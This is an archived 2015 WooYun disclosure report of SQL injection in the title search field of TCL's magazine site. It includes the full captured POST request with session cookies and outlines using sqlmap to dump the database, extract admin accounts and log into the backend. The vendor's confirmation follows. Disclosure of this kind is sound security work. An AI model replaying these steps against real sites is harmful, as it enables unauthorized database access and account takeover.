乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-10: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
TCL某平台存SQL注入,已入后台
1.漏洞地址:http://magazine.tcl.com/ 点击综合查询,标题处有sql注入
POST http://magazine.tcl.com/Default.aspx HTTP/1.1Host: magazine.tcl.comConnection: keep-aliveContent-Length: 6452Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://magazine.tcl.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.69Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://magazine.tcl.com/Default.aspxAccept-Encoding: gzip, deflate, lzmaAccept-Language: zh-CN,zh;q=0.8Cookie: Jath_b50b_saltkey=Kx877z38; Jath_b50b_lastvisit=1444459536; Jath_b50b_sid=U809pe; Jath_b50b_sendmail=1; pgv_pvi=9884900352; pgv_si=s5924673536; Jath_b50b_lastact=1444463138%09misc.php%09seccode; Jath_b50b_seccode=2246.01b12bbc22b72b9696; ASP.NET_SessionId=1erwefzmbwr3a555yv02ql45__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTk2NDM0OTk5NA9kFgICAg9kFhRmDxUB%2BAo8UD4NCjxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9Nzc1IGJvcmRlcj0wPg0KPFRCT0RZPg0KPFRSPg0KPFREIHdpZHRoPTc1NiBjb2xTcGFuPTQ%2BPElNRyBzcmM9Ii9pbWFnZXMvdGNsX3RvcC5qcGciIHdpZHRoPTc4MD4g44CAPC9URD48L1RSPg0KPFRSPg0KPFREIGJnQ29sb3I9IzhmOGY4ZiBoZWlnaHQ9MjAgd2lkdGg9NDM0PjxTUEFOIGNsYXNzPSJ3aGl0ZSBzdHlsZTEgc3R5bGUyIj48U1BBTiBjbGFzcz0id2hpdGUgc3R5bGUxIHN0eWxlMiI%2BJm5ic3A7Jm5ic3A7PEZPTlQgY29sb3I9I2ZmZmZmZj4mbmJzcDs8L0ZPTlQ%2BPFNQQU4gY2xhc3M9c3R5bGUzPjxBIGhyZWY9Ii9kZWZhdWx0LmFzcHgiPjxGT05UIGNvbG9yPSNmZmZmZmY%2B6aaW6aG1PC9GT05UPjwvQT48L1NQQU4%2BPC9TUEFOPjxTUEFOIGNsYXNzPXN0eWxlMz48Rk9OVCBjb2xvcj0jZmZmZmZmPiZuYnNwO3wmbmJzcDs8QSBocmVmPSIvZGVmYXVsdC5hc3B4I3RpcCI%2BPEZPTlQgY29sb3I9I2ZmZmZmZj7mnJ%2FliIrmn6Xor6I8L0ZPTlQ%2BPC9BPjxGT05UIGNvbG9yPSNmZmZmZmY%2BJm5ic3A7PC9GT05UPnwgPEEgaHJlZj0iL21vcmVkb3dubG9hZC5hc3B4Ij48Rk9OVCBjb2xvcj0jZmZmZmZmPuacn%2BWIiuS4i%2Bi9vTwvRk9OVD48L0E%2BJm5ic3A7fCA8QSBocmVmPSIvYWJvdXRUQ0xXYXRjaC5odG1sIj48Rk9OVCBjb2xvcj0jZmZmZmZmPuWFs%2BS6juWKqOaAgTwvRk9OVD48L0E%2BJm5ic3A7fCZuYnNwOzxBIGhyZWY9Ii9lbiI%2BPEZPTlQgY29sb3I9I2ZmZmZmZj5FbmdsaXNoIHZlcnNpb248L0ZPTlQ%2BPC9BPjwvU1BBTj48L1NQQU4%2BPC9GT05UPjwvVEQ%2BDQo8VEQgYmdDb2xvcj0jOGY4ZjhmIHdpZHRoPTEzND48U1BBTiBjbGFzcz0id2hpdGUgc3R5bGUxIHN0eWxlMiBzdHlsZTMiPuacn%2BWIiuiuoumYhSBFbWFpbO%2B8mjwvU1BBTj4gPC9URD4NCjxURCBiZ0NvbG9yPSM4ZjhmOGYgd2lkdGg9ODA%2BPElOUFVUIGlkPUVtYWlsX2JveCBzdHlsZT0iSEVJR0hUOiAyNHB4OyBXSURUSDogNzlweCIgc2l6ZT0xNj4gPC9URD4NCjxURCBiZ0NvbG9yPSM4ZjhmOGYgd2lkdGg9MTI5PjxBIGhyZWY9ImphdmFzY3JpcHQ6RGluZ1l1ZSgnVENMV0FUQ0gwMDAxJyxkb2N1bWVudC5mb3Jtc1swXS5FbWFpbF9ib3gudmFsdWUpIj48SU1HIGJvcmRlcj0wIHNyYz0iL21hbmFnZXIvaW1hZ2VzL3N1YnNjcmlwdGlvbi5naWYiIHdpZHRoPTQ0IGhlaWdodD0xOD48L0E%2BPEEgaHJlZj0iamF2YXNjcmlwdDpUdWlEaW5nKCdUQ0xXQVRDSDAwMDEnLGRvY3VtZW50LmZvcm1zWzBdLkVtYWlsX2JveC52YWx1ZSkiPjxJTUcgYm9yZGVyPTAgc3JjPSIvbWFuYWdlci9pbWFnZXMvdW5zdWJzY3JpcHRpb24uZ2lmIiB3aWR0aD01MCBoZWlnaHQ9MTg%2BPC9BPjwvVEQ%2BPC9UUj48L1RCT0RZPjwvVEFCTEU%2BPC9QPmQCAQ8WAh4LXyFJdGVtQ291bnQCCBYQZg9kFgJmDxUCAzAwMQlUQ0zliqjmgIFkAgEPZBYCZg8VAgMwMDQJVENM56e75YqoZAICD2QWAmYPFQIDMDA1D1RDTOeOi%2BeJjOS4lueVjGQCAw9kFgJmDxUCAzAwMgbmoqbmg7NkAgQPZBYCZg8VAgMwMDMJVENM5biC5Zy6ZAIFD2QWAmYPFQIDMDA3D%2BWbvemZheeUteW3peS6umQCBg9kFgJmDxUCAzAwOAlUQ0zpgJrorq9kAgcPZBYCZg8VAgMwMDYPVENM546L54mM5pyN5YqhZAIDDxAPFgYeC18hRGF0YUJvdW5kZx4NRGF0YVRleHRGaWVsZAUFbW5hbWUeDkRhdGFWYWx1ZUZpZWxkBQNtaWRkEBUBCVRDTOWKqOaAgRUBAzAwMRQrAwFnZGQCBQ8QDxYGHwFnHwIFBWN5ZWFyHwMFBWN5ZWFyZBAVDQQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEMjAxMAQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUEMjAwNAQyMDAzFQ0EMjAxNQQyMDE0BDIwMTMEMjAxMgQyMDExBDIwMTAEMjAwOQQyMDA4BDIwMDcEMjAwNgQyMDA1BDIwMDQEMjAwMxQrAw1nZ2dnZ2dnZ2dnZ2dnZGQCEA8VAgB8PElNRyBzdHlsZT0iSEVJR0hUOiAxNDVweDsgV0lEVEg6IDIyNXB4IiBib3JkZXI9MCBzcmM9Ii91cGxvYWQvMDAxLzI2Ny8yNjfmnJ%2FliqjmgIHlsIHpnaIlMjAoMSkuanBnIiB3aWR0aD0xNjg4IGhlaWdodD0xMTA2PmQCEQ9kFgJmDw8WAh4EVGV4dAUo44CKVENM5Yqo5oCB44CLMjAxNeW5tOesrDfmnJ8o5oC7MjY45pyfKWRkAhMPZBYCAgEPFgIeB1Zpc2libGVoFgZmD2QWBGYPZBYCZg8WBB4EaHJlZgUUYXJ0aWNsZS5hc3B4P2lkPTg2MTgeBXRpdGxlBTDmjoDotbfkvaDnmoTnm5blpLTmnaXigJTigJTorr9UQ0zmlrDnlobliIblhazlj7gWAmYPDxYIHghJbWFnZVVybAUWdXBsb2FkLzAwMS8yNjgvMDEyLmpwZx4FV2lkdGgbAAAAAADAbEABAAAAHgZIZWlnaHQbAAAAAAAAY0ABAAAAHgRfIVNCAoADZGQCAg9kFgICAQ8PFgQfBAUw5o6A6LW35L2g55qE55uW5aS05p2l4oCU4oCU6K6%2FVENM5paw55aG5YiG5YWs5Y%2B4HgtOYXZpZ2F0ZVVybAUUYXJ0aWNsZS5hc3B4P2lkPTg2MThkZAIBD2QWAgIBDxYCHglpbm5lcmh0bWwFUTwvc3Bhbj4NCjxwIGNsYXNzPW1zb25vcm1hbCBzdHlsZT0idGV4dC1hbGlnbjoganVzdGlmeTsgdGV4dC1qdXN0aWZ5OiBpbnRlci1pZC4uLmQCAg9kFgICAQ9kFgICAQ8PFgQfBAUI6K%2Bm57uGPj4fDAUUYXJ0aWNsZS5hc3B4P2lkPTg2MThkZAIVDxYCHwVnFgQCAQ9kFgQCAQ9kFgJmDxAPFgYfAWcfAgUFbW5hbWUfAwUDbWlkZBAVDQlUQ0zliqjmgIEG5qKm5oOzCVRDTOW4guWcuglUQ0znp7vliqgPVENM546L54mM5LiW55WMD1RDTOeOi%2BeJjOacjeWKoQ%2Flm73pmYXnlLXlt6XkuroJVENM6YCa6K6vCOS5jOS6kTExAzAwMAMwMDAG5LmM5LqRBuWFqOmDqBUNAzAwMQMwMDIDMDAzAzAwNAMwMDUDMDA2AzAwNwMwMDgFMTAwMDEEJ29yIAYnb3IgXFwEdGVzdANhbGwUKwMNZ2dnZ2dnZ2dnZ2dnZ2RkAgMPZBYEZg8QDxYGHwFnHwIFBWN5ZWFyHwMFBWN5ZWFyZBAVDgQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEMjAxMAQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUEMjAwNAQyMDAzBuWFqOmDqBUOBDIwMTUEMjAxNAQyMDEzBDIwMTIEMjAxMQQyMDEwBDIwMDkEMjAwOAQyMDA3BDIwMDYEMjAwNQQyMDA0BDIwMDMDYWxsFCsDDmdnZ2dnZ2dnZ2dnZ2dnZGQCAg8QDxYGHwFnHwIFBWN1cnFpHwMFBWN1cnFpZBAVCQE4ATcBNgE1ATQBMwEyATEG5YWo6YOoFQkBOAE3ATYBNQE0ATMBMgExA2FsbBQrAwlnZ2dnZ2dnZ2dkZAIED2QWAgIBD2QWBAICDzwrAAoBAA8WBh4LVmlzaWJsZURhdGUGAEAmty%2B50ogeAlNEFgEGEscyGbS50ogfBWhkZAIGDzwrAAoBAA8WBh8OBgDAiq%2FC0NKIHw8WAQYSR5cRR9HSiB8FaGRkAhcPFgIfBWgWAgIBD2QWBAIBD2QWAmYPEA8WAh8BZ2RkFgBkAgMPZBYEZg8QDxYCHwFnZGQWAGQCAg8QDxYCHwFnZGQWAGQCHQ8VAckEPFRBQkxFIGlkPUxpbmsgY2VsbFNwYWNpbmc9MCBjZWxsUGFkZGluZz0wIHdpZHRoPSIxMDAlIiBib3JkZXI9MD4NCjxUQk9EWT4NCjxUUj4NCjxURCBiZ0NvbG9yPSNlY2U5ZDggd2lkdGg9MTk0PjxTUEFOIGNsYXNzPXdoaXRlPjwvU1BBTj48L1REPg0KPFREIHdpZHRoPTM2PjwvVEQ%2BDQo8VEQgY2xhc3M9d2hpdGUgYmdDb2xvcj0jZmZlOGQ4IGhlaWdodD0yMCBiYWNrZ3JvdW5kPWltYWdlcy9Cb3R0b21fbGlua19iZy5naWYgd2lkdGg9NDk1IGFsaWduPXJpZ2h0PjxBIGNsYXNzPXdoaXRlIGhyZWY9Ii9hYm91dFRDTFdhdGNoLmh0bWwiPjxGT05UIGNvbG9yPSNmZmZmZmY%2B5YWz5LqOVENMPC9GT05UPjwvQT4mbmJzcDt8Jm5ic3A7PEEgY2xhc3M9d2hpdGUgaHJlZj0ibWFpbHRvOnRhbmd5dEB0Y2wuY29tIj48Rk9OVCBjb2xvcj0jZmZmZmZmPuaKgOacr%2BaUr%2BaMgTwvRk9OVD48L0E%2BJm5ic3A7fCZuYnNwOzxBIGNsYXNzPXdoaXRlIGhyZWY9Im1haWx0bzp0Y2xkdEB0Y2wuY29tIj48Rk9OVCBjb2xvcj0jZmZmZmZmPuiBlOezu%2BaIkeS7rDwvRk9OVD48L0E%2BJm5ic3A7Jm5ic3A7IDwvVEQ%2BPC9UUj48L1RCT0RZPjwvVEFCTEU%2BZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUGYm5zZWVrBQhtZW51c2VlaylWlNv8pAuee6RtEP4wx6iTqutw&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWWgLr7IP0CQKZlKEkAtyDiusFAuX37RMCpuDqxg4CpuD2owcCpuDCGAKm4K71CAKm4LrSAQKm4IaPCgLN2bSWDQLN2YDzBQLN2ayaAwLN2bj3CwLN2YSsBALN2ZCJDQLN2fzlBQL2vJDVCwL3vJDVCwL4vJDVCwLxvJDVCwLyvJDVCwLzvJDVCwL0vJDVCwLtvJDVCwLuvJDVCwL2vNDUCwL2vMzUCwL2vNjUCwL2vNTUCwL2vMDUCwL2vLzUCwL2vMjUCwL2vMTUCwL2vPDUCwL2vOzUCwL3vNDUCwL3vMzUCwL3vNjUCwL3vNTUCwL3vMDUCwLWoOqVCwLijd2WBgLVuYTmBgKalKEkAt%2BDiusFAvqU6MAPAuH9x90JAozHpasEAquog4AOAtax4Z0IAv2a%2F%2BoCAsjwv7QKAoqAibsLApOnuZYOAqmGotwJAu2Ir%2FMOAsfb788KAsL37RMCgeDqxg4CgeD2owcCgeDCGAKB4K71CAKB4LrSAQKB4IaPCgLq2bSWDQLq2YDzBQLq2ayaAwLq2bj3CwLq2YSsBALq2ZCJDQLq2fzlBQKfuKP4CgKNi5qVAwKci5qVAwKfi5qVAwKei5qVAwKZi5qVAwKYi5qVAwKbi5qVAwKai5qVAwLIq%2F6QBQLsiPSpBwKb%2BvTpDgKbgJvpCALN0tLCCAL3t8agDwLN0sbCCAKm%2FOxgAvWFgvUG2rbDIJWnIlo84f4j%2Bphgw9gbmLg%3D&tmid=001&tyear=2015&txtseek=&smid=001&syear=2015&scurqi=8&stitle=%25&swriter=&sbody=&sdate1=&sdate2=&bnfullseek=%B2%E9%D1%AF
其中post数据stitle字段存在sql注入2.丢到sqlmap,跑库
3.跑出后台用户
4,登录后台
危害等级:中
漏洞Rank:8
确认时间:2015-10-12 08:40
已经提交开发人员处理,感谢您对TCL的关注,谢谢!
暂无